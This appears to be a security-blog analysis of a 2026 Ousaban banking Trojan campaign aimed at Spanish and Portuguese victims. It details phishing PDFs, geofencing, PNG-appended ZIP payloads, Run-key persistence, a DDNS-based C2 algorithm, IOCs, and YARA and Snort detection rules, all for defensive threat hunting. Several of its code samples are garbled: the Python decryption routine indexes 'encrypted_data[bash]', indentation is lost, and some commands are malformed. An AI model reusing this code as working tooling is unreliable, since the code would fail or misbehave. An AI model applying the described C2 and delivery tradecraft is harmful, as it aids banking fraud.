Ousaban Banking Trojan 2026 Campaign: Geofenced Malware Delivery via Steganographic Payloads and Dynamic C2 Resolution + Video

Listen to this Post

Featured Image

Introduction

The Ousaban banking Trojan, historically prolific across Latin American financial institutions, has re-emerged in a sophisticated campaign targeting the Iberian Peninsula since May 2026. This iteration represents a significant evolution in threat actor tradecraft, combining geofencing, environment-aware access controls, steganographic payload delivery, and dynamically resolved command-and-control (C2) infrastructure to evade detection and restrict exposure exclusively to Spanish and Portuguese victims. Understanding this multi-stage infection chain—from hex-escaped JavaScript in phishing PDFs to daily-changing DDNS hostnames—is essential for defenders seeking to detect, analyze, and mitigate this advanced banking malware.

Learning Objectives

  • Objective 1: Analyze the complete Ousaban infection chain, including PDF-based phishing, server-side geofencing, VBScript steganographic extraction, and persistence mechanisms.
  • Objective 2: Identify and implement detection strategies for geofencing evasion techniques, environment checks, and dynamic C2 resolution using DDNS and Pastebin decoys.
  • Objective 3: Apply threat hunting methodologies, including IOCs, memory forensics, and network traffic analysis, to uncover Ousaban activity in enterprise environments.

You Should Know

  1. Phishing PDF with Hex-Escaped JavaScript and Deceptive UX

The attack commences with a PDF file disguised as a corrupted tax or documentation file. Upon opening, victims are presented with a deceptive message box containing an “Atualizar” (Update) button that links to a malicious webpage. The PDF embeds JavaScript code that is hex-escaped—a technique that obfuscates the script’s true intent and complicates static detection by security tools. This JavaScript automatically accesses the same malicious webpage, functioning as a secondary infection vector should the user fail to click the button.

Detection Strategy: Monitor for PDF files containing embedded JavaScript with hex-escaped characters. Use `pdfid.py` (Didier Stevens) to identify JavaScript and `peepdf` to analyze obfuscated code:

 Extract and analyze JavaScript from suspicious PDFs
pdfid.py suspicious.pdf
peepdf -f suspicious.pdf -c "extract js"

Windows PowerShell alternative for initial triage:

Get-Content -Path suspicious.pdf -Raw | Select-String -Pattern "\x[0-9a-fA-F]{2}" | Measure-Object

2. Server-Side Geofencing and Environment Checks

Earlier versions of the malicious landing page performed client-side checks for language, timezone, IP geolocation, VPN indicators, browser behavior, screen resolution, rendering capability, and font enumeration to filter out sandboxes, crawlers, and non-target users. The updated campaign has shifted these checks to the server side. Users outside Spain and Portugal receive a PDF containing the message “Access denied. Service not available from your country”.

Why This Matters: Server-side checks obscure specific filtering criteria from security analysts, making it harder to reverse-engineer the exact conditions required to access the payload. Defenders must rely on network traffic analysis to infer these checks.

Linux Command to Identify Suspicious Inbound/Outbound Patterns:

 Monitor for connections to known malicious domains
sudo tcpdump -i any -1n 'host 213.159.64.191 or host 162.33.179.46' -v

Extract geolocation from suspicious IPs
curl -s "http://ip-api.com/json/213.159.64.191" | jq '.country, .city, .isp'

3. VBScript Downloader and Steganographic Payload Extraction

Upon successful environment validation, the server delivers a VBS file containing numerous benign function calls alongside embedded malicious code. The VBScript downloads a PNG image file that visually resembles a PDF icon. However, this image contains an appended ZIP archive—a classic steganographic technique where the ZIP file is concatenated to the end of the image without breaking the PNG structure.

Step-by-Step Extraction Process:

  1. The VBS downloads the PNG from the C2 server.
  2. It reads the PNG file and locates the ZIP header (PK\x03\x04) appended at the end.
  3. The ZIP is extracted to the Temp folder.

4. The Ousaban executable is dropped to `C:\SysMain_5874288\`.

  1. After execution, the VBS deletes the ZIP, PNG, and itself to minimize forensic footprint.

Manual Extraction for Forensic Analysis:

 Identify appended ZIP within PNG
binwalk -e suspicious.png

If binwalk fails, manually extract from offset
dd if=suspicious.png of=extracted.zip bs=1 skip=<offset> 

Python Script for Steganographic Extraction:

import zipfile
import os

def extract_zip_from_png(png_path, output_path):
with open(png_path, 'rb') as f:
data = f.read()
 Locate ZIP header
zip_header = b'PK\x03\x04'
offset = data.find(zip_header)
if offset != -1:
with open(output_path, 'wb') as zip_file:
zip_file.write(data[offset:])
return offset

Usage
extract_zip_from_png('suspicious.png', 'extracted.zip')

4. Persistence and Configuration Decryption

Once executed, Ousaban establishes persistence by creating a registry value named `Financeiro` (Portuguese for “Finance”) under the `CurrentVersion\Run` key. It also creates an empty file named maisum.dat, using its creation timestamp as the installation date for tracking purposes.

Persistence Detection Commands:

 Windows Registry Check
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Financeiro
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Financeiro

Check for maisum.dat in common locations
dir C:.dat /s | findstr maisum

The malware decrypts bank-related strings using a custom algorithm widely employed by Latin American banking Trojans, including Casbaneiro. The encryption scheme uses a random first byte as the base offset, with subsequent bytes XORed against key characters and subtracted from the offset.

Custom Decryption Logic (Python):

def decrypt_ousaban_string(encrypted_data, key):
decrypted = []
base_offset = encrypted_data[bash]
for i in range(1, len(encrypted_data)):
xor_result = encrypted_data[bash] ^ ord(key[(i-1) % len(key)])
if xor_result < base_offset:
decrypted.append(xor_result + 0xFF - base_offset)
else:
decrypted.append(xor_result - base_offset)
base_offset = encrypted_data[bash]
return bytes(decrypted).decode('latin-1')

Targeted Banks (Partial List from Figure 8):

  • Spanish and Portuguese financial institutions including Santander, CaixaBank, Banco de Portugal, and others.
  1. Dynamic C2 Resolution with Pastebin Decoy and DDNS

Ousaban’s C2 infrastructure represents a masterclass in operational security. The malware decrypts a Pastebin link containing what appears to be configuration data with a private IP address. However, this is a deliberate decoy designed to divert researchers.

The real C2 IP is resolved through daily-changing DDNS hostnames. The subdomains consist of a hard-coded string “aki” concatenated with the first eight characters of an MD5 hash. This MD5 is generated from a hard-coded salt (a9f8b7c6e5d4f3a2b1c8d7e6f5g4h3i2j1k9l8m7n6o5p4q) combined with the current date.

Critical Observation: To obtain the current date, Ousaban deliberately accesses Google’s Automated Queries page and extracts the date from the response. This technique ensures the malware operates correctly regardless of system clock tampering.

Command Set Revealed by Analysis:

| Command | Purpose |

|||

| `Convite` | Collect user information |

| `Handle` | Assign a victim ID |

| `ON-LINE` | Heartbeat |

| `xyScree` | Get screen resolution |

| `Iniciar` | Start screenshot capture and remote control |

Network Traffic Analysis (Snort/Suricata Rules):

alert tcp $HOME_NET any -> any any (msg:"Ousaban Heartbeat Detected"; 
content:"ON-LINE"; nocase; sid:1000001;)
alert tcp $HOME_NET any -> any any (msg:"Ousaban Convite Command"; 
content:"Convite"; nocase; sid:1000002;)

6. Encrypted Communications and Advanced Evasion

Most traffic between Ousaban and its C2 server is encrypted using the previously described algorithm. All encrypted data appears as different strings even when the plaintext is identical, complicating signature-based detection. The malware can execute remote commands including mouse/keyboard control, clipboard injection, keylogging, and generating fake messages to deceive victims.

YARA Rule for Ousaban Detection:

rule Ousaban_Banking_Trojan {
meta:
description = "Detects Ousaban banking Trojan based on string patterns"
author = "Threat Researcher"
date = "2026-07-02"
strings:
$convite = "Convite" ascii wide
$online = "ON-LINE" ascii wide
$iniciar = "Iniciar" ascii wide
$financeiro = "Financeiro" ascii wide
$sysmain = "SysMain_" ascii
condition:
any of ($convite, $online, $iniciar) and ($financeiro or $sysmain)
}

What Undercode Say

  • Key Takeaway 1: The shift from client-side to server-side geofencing represents a critical evolution in malware delivery, making it significantly harder for security researchers to reverse-engineer access controls without compromising an actual target machine in the Iberian Peninsula.

  • Key Takeaway 2: The Pastebin decoy combined with daily-changing DDNS hostnames and Google date extraction demonstrates an advanced understanding of defensive countermeasures—threat actors are actively building redundant, obfuscated C2 channels that resist takedown efforts.

Analysis: The Ousaban campaign exemplifies how banking Trojans have matured beyond simple credential theft into sophisticated, multi-stage operations with built-in anti-analysis capabilities. The use of steganography (appending ZIP to PNG) is particularly noteworthy—it bypasses many network security appliances that fail to inspect image files deeply. The encryption algorithm, while not cryptographically complex, remains effective due to its random base offset that ensures unique ciphertexts for identical plaintexts.

From a defensive perspective, organizations should prioritize email filtering for PDF attachments with embedded JavaScript, deploy endpoint detection solutions capable of analyzing VBScript behavior, and implement network monitoring for the specific command strings identified in this analysis. The dynamic C2 infrastructure demands proactive threat hunting—security teams should generate daily predictions of potential DDNS subdomains based on the known algorithm and proactively block them.

The most concerning aspect is the threat actor’s adaptability: the campaign has already evolved from late 2025 ClickFix techniques to the current PDF-and-geofencing approach. This suggests a well-resourced actor continuously refining their tradecraft based on defensive responses.

Prediction

  • +1 Geofenced malware delivery will become the standard for region-specific banking Trojans, forcing security vendors to develop more sophisticated geo-agnostic detection methods that focus on behavioral patterns rather than payload availability.

  • -1 Small and medium enterprises in Spain and Portugal without advanced threat detection capabilities remain highly vulnerable—the social engineering aspect (fake tax documentation) is particularly effective during tax seasons.

  • -1 The use of legitimate services like Pastebin and Google for C2 operations will likely increase, as threat actors continue to abuse trusted platforms to blend malicious traffic with legitimate activity.

  • +1 Threat intelligence sharing between Spanish and Portuguese financial institutions and cybersecurity agencies will improve as a direct response to this campaign, potentially leading to faster IOC dissemination and coordinated takedown efforts.

  • -1 The encryption algorithm’s longevity (used across multiple Latin American banking Trojans) indicates that static signature-based detection will remain ineffective against Ousaban variants—behavioral and memory-based detection are the only reliable defenses.

  • +1 Open-source threat hunting tools incorporating the DDNS prediction algorithm will emerge, enabling defenders to proactively block C2 domains before they are resolved by compromised hosts.

IOCs for Reference (Fortinet Report):

| Type | Indicators |

|||

| Domains | faturanova[.]xyz, facture-in[.]pages[.]dev, facture-arsys[.]duckdns[.]org, faturanova[.]duckdns[.]org, controlfacturas[.]site |

| IPs | 213[.]159[.]64[.]191, 162[.]33[.]179[.]46, 91[.]92[.]240[.]140, 78[.]40[.]209[.]32 |

| PDF Hashes | 6bc2e11b0917f47d0557288c4f0cb20bd7589185943b989a969fdc6d3704ee73, 540ee1936e61d2344b5ebc93485589a351ec2f113a9b4940ae16f3baa4807392 |

| VBS Hashes | 5a2ed557c357ba8f96f2d55a8a00695987806b5df766cd1dfdab0cbed111774a, 19ac18a50abb48dc0ea9524850acfaec49359e6b3bcc67c6193c2d56da812c71 |

| EXE Hashes | ffb9eb47cc0cb2f43e04a10dc84df13d04bca1ebacbe47fad0b669728de2f59c, 18fd38988d58dd930f5992d448cc09a9400c1eafba76b820b9a83239ac48cf4e |

▶️ Related Video (78% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Flavioqueiroz Cybercrime – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky